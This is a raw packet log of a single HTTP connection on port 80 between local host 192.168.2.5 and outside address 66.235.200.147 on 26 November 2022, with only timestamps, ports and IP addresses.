Nov 26, 2022 11:17:42.586848974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586860895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586865902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586891890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586910963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586935043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586954117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586972952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586992025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587011099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587029934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587048054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587068081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587086916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587105036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587125063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587143898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587162971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587182045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587222099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587368011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587368011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587368011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587368011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587368011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587368011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587368011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587474108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587474108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587474108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587474108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587572098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587646961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587666035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587683916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587703943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587711096 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587723017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587738037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587742090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587758064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587776899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587783098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587796926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587819099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587837934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587857962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587878942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587881088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587881088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587898016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587908030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587908030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587917089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587935925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587954998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587959051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587973118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.587984085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.587990999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588010073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588028908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588041067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.588047028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588063002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.588103056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.588531017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588606119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588624954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588675022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588692904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588696003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.588710070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588727951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588741064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.588747025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588767052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588787079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588788033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.588809013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588826895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588830948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.588830948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.588840961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588855028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588869095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588881969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588896036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588911057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588924885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588938951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588952065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.588968992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.589001894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.589031935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.589072943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.589576960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.589643955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.589658976 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.589705944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.589725018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.589744091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.589761972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.589787960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.589804888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.589824915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.589843035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.589860916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.589879990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.589899063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.589907885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.589917898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.589932919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.589937925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.589956999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.589972019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.589976072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.589994907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590004921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.590013027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590030909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590049982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590065956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.590068102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590087891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590095997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.590106964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590120077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.590507984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590528011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590544939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590563059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590586901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.590612888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.590691090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590709925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590729952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590749979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590768099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590770960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.590786934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590807915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590816975 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.590826988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590846062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590864897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590866089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.590895891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.590897083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590917110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590933084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.590934992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590955973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590975046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590993881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.590997934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.591013908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591033936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591053009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591072083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591085911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591098070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.591098070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.591098070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.591099977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591116905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.591120005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591167927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.591629028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591648102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591667891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591687918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591708899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591737986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.591753006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591767073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.591772079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591789961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591814041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591833115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591851950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591851950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.591872931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591892004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591893911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.591911077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591929913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591943026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.591967106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591985941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.591988087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.592005968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592025042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592042923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592051983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.592061996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592076063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.592082024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592099905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592128038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.592158079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.592655897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592675924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592694044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592713118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592731953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592741013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.592750072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592767954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592776060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.592787027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592801094 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.592808008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592827082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592828989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.592845917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592864990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592884064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592892885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.592902899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592916965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.592922926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592942953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592962027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592971087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.592978954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.592982054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.592998981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593015909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.593017101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593035936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593055010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593066931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.593075037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593101025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.593585014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593605042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593625069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593651056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.593667984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593683958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.593703032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593722105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593739986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593760014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593779087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593782902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.593799114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593815088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.593817949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593837023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593857050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593869925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.593874931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593894958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593900919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.593913078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593930960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593943119 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.593955994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593975067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.593995094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.594002008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.594012976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.594031096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.594032049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.594049931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.594058037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.594168901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.597362995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597387075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597405910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597424030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597441912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597461939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597461939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.597481012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597486973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.597500086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597517014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597524881 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.597536087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597554922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597573042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597577095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.597592115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597604990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.597611904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597625017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.597630978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597650051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597670078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597681046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.597688913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597701073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.597707033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597724915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597739935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.597743034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597762108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597779989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597783089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.597799063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597812891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.597819090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597839117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597846985 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.597858906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597877979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597896099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597904921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.597914934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597929001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.597934008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597951889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597970963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.597973108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.597989082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598009109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598016977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.598026991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598038912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.598047018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598066092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598068953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.598083973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598104000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598112106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.598123074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598140001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598157883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598177910 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.598177910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598197937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.598198891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598217964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598228931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.598233938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.598269939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.598628044 CET	80	49707	66.235.200.147	192.168.2.5
